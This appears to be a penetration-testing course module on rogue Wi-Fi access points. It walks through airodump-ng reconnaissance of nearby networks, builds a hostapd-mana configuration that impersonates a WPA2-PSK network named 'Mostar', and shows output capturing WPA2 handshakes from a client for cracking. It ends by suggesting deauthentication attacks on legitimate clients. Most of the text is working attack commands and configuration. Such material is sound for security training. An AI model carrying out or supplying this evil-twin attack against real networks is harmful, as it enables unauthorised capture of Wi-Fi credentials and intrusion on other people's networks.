Module 10: Rogue Access Points
The Basics of Rogue APs
Use a Rogue AP with an identical SSID to have a device reference its Preferred Network List (PNL) and try to connect to your AP with the legitimate PSK.
Discovery
Conduct recon to gather information about the AP you'll be maliciously mirroring.
kali@kali:~$ sudo airodump-ng -w discovery --output-format pcap wlan0mon
CH 12 ][ Elapsed: 0 s ][ 2020-08-14 16:23
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
CD:C2:25:9A:47:BA -45 3 2 0 6 195 WPA2 CCMP MGT Sarajevo
94:36:45:CA:71:61 -46 3 4 0 6 195 WPA2 CCMP PSK Zagreb
FC:7A:2B:88:63:EF -53 5 0 0 1 130 WPA2 CCMP PSK Mostar
1E:E1:3E:95:52:7D -87 2 0 0 11 130 OPN Budva
85:28:13:AE:50:5C -91 3 0 0 11 130 WPA2 CCMP PSK Beograd
BSSID STATION PWR Rate Lost Frames Notes Probes
94:36:45:CA:71:61 E6:D9:90:B0:B2:4C -54 0 - 0e 0 2
94:36:45:CA:71:61 05:E3:5B:E6:D9:A4 -73 0e-54 0 2
85:28:13:AE:50:5C E6:DE:B9:2A:56:83 -91 0 - 5e 487 6
CD:C2:25:9A:47:BA 98:D5:95:6D:25:77 -37 0 - 1e 0 2
(not associated) A7:AD:4A:2B:5E:ED -54 0 - 1 3 9 Yugoslavia
FC:7A:2B:88:63:EF FE:5C:F4:2B:D4:3E -48 0 - 6 0 1
The above example lets us know Mostar is a WPA2-PSK network with CCMP. It runs at 130 Mbit, and is on channel 1.
Creating a Rogue AP
Building the hostapd-mana Configuration
The simplest configuration for hsotapd-mana:
kali@kali:~$ cat Mostar-mana.conf
interface=wlan0
ssid=Mostar
channel=1
Adding hw_mode to the config file:
kali@kali:~$ cat Mostar-mana.conf
interface=wlan0
ssid=Mostar
channel=1
hw_mode=g
ieee80211n=1
Adding security configuration:
kali@kali:~$ cat Mostar-mana.conf
interface=wlan0
ssid=Mostar
channel=1
hw_mode=g
ieee80211n=1
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=ANYPASSWORD
wpa_pairwise=TKIP CCMP
rsn_pairwise=TKIP CCMP
Final Mostar-mana.conf:
kali@kali:~$ cat Mostar-mana.conf
interface=wlan0
ssid=Mostar
channel=1
hw_mode=g
ieee80211n=1
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=ANYPASSWORD
wpa_pairwise=TKIP
rsn_pairwise=TKIP CCMP
mana_wpaout=/home/kali/mostar.hccapx
Capturing Handshakes
Starting hostapd-mana to capture handshakes:
kali@kali:~$ sudo hostapd-mana Mostar-mana.conf
Configuration file: Mostar-mana.conf
MANA: Captured WPA/2 handshakes will be written to file 'mostar.hccapx'.
Using interface wlan0 with hwaddr 2e:0b:05:98:f8:66 and ssid "Mostar"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
MANA: Captured a WPA/2 handshake from: fe:5c:f4:2b:d4:3e
wlan0: AP-STA-POSSIBLE-PSK-MISMATCH fe:5c:f4:2b:d4:3e
MANA: Captured a WPA/2 handshake from: fe:5c:f4:2b:d4:3e
wlan0: AP-STA-POSSIBLE-PSK-MISMATCH fe:5c:f4:2b:d4:3e
MANA: Captured a WPA/2 handshake from: fe:5c:f4:2b:d4:3e
wlan0: AP-STA-POSSIBLE-PSK-MISMATCH fe:5c:f4:2b:d4:3e
MANA: Captured a WPA/2 handshake from: fe:5c:f4:2b:d4:3e
wlan0: AP-STA-POSSIBLE-PSK-MISMATCH fe:5c:f4:2b:d4:3e
MANA: Captured a WPA/2 handshake from: fe:5c:f4:2b:d4:3e
To help client devices connect to your rogue AP, consider sending deauths to the legitimate AP's clients.
Last updated